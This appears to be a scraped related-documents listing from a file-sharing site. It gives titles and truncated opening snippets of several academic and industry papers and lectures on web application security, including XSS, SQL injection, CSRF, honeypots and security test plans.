More informationWeb Application Security
Web Application Security John Zaharopoulos ITS - Security 10/9/2012 1 Web App Security Trends Web 2.0 Dynamic Webpages Growth of Ajax / Client side Javascript Hardening of OSes Secure by default Auto-patching
More informationUniversity of Wisconsin Platteville SE411. Senior Seminar. Web System Attacks. Maxwell Friederichs. April 18, 2013
University of Wisconsin Platteville SE411 Senior Seminar Web System Attacks Maxwell Friederichs April 18, 2013 Abstract 1 Data driven web applications are at the cutting edge of technology, and changing
More informationWeb application security
Web application security Sebastian Lopienski CERN Computer Security Team openlab and summer lectures 2010 (non-web question) Is this OK? int set_non_root_uid(int uid) { // making sure that uid is not 0
More informationWeb Application Security Guidelines for Hosting Dynamic Websites on NIC Servers
Web Application Security Guidelines for Hosting Dynamic Websites on NIC Servers The Website can be developed under Windows or Linux Platform. Windows Development should be use: ASP, ASP.NET 1.1/ 2.0, and
More informationDetection of SQL Injection and XSS Vulnerability in Web Application
International Journal of Engineering and Applied Sciences (IJEAS) ISSN: 2394-3661, Volume-2, Issue-3, March 2015 Detection of SQL Injection and XSS Vulnerability in Web Application Priti Singh, Kirthika
More informationSample Report. Security Test Plan. Prepared by Security Innovation
Sample Report Security Test Plan Prepared by Security Innovation Table of Contents 1.0 Executive Summary... 3 2.0 Introduction... 3 3.0 Strategy... 4 4.0 Deliverables... 4 5.0 Test Cases... 5 Automation...
More informationCS 558 Internet Systems and Technologies
CS 558 Internet Systems and Technologies Dimitris Deyannis deyannis@csd.uoc.gr 881 Heat seeking Honeypots: Design and Experience Abstract Compromised Web servers are used to perform many malicious activities.
More informationSimon Fraser University. Web Security. Dr. Abhijit Sen CMPT 470
Web Security Dr. Abhijit Sen 95% of web apps have Vulnerabilities Cross-site scripting (80 per cent) SQL injection (62 per cent) Parameter tampering (60 per cent) http://www.vnunet.com/vnunet/news/2124247/web-applicationswide-open-hackers
More informationAdvanced Web Technology 10) XSS, CSRF and SQL Injection 2
Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 Table of Contents Cross Site Request Forgery - CSRF Presentation
More informationCross Site Scripting Prevention
Project Report CS 649 : Network Security Cross Site Scripting Prevention Under Guidance of Prof. Bernard Menezes Submitted By Neelamadhav (09305045) Raju Chinthala (09305056) Kiran Akipogu (09305074) Vijaya
More informationTop Ten Web Attacks. Saumil Shah Net-Square. BlackHat Asia 2002, Singapore
Top Ten Web Attacks Saumil Shah Net-Square BlackHat Asia 2002, Singapore TodayÕs battleground Ð the Web Web sites and web applications rapidly growing. Complex business applications are now delivered over
More information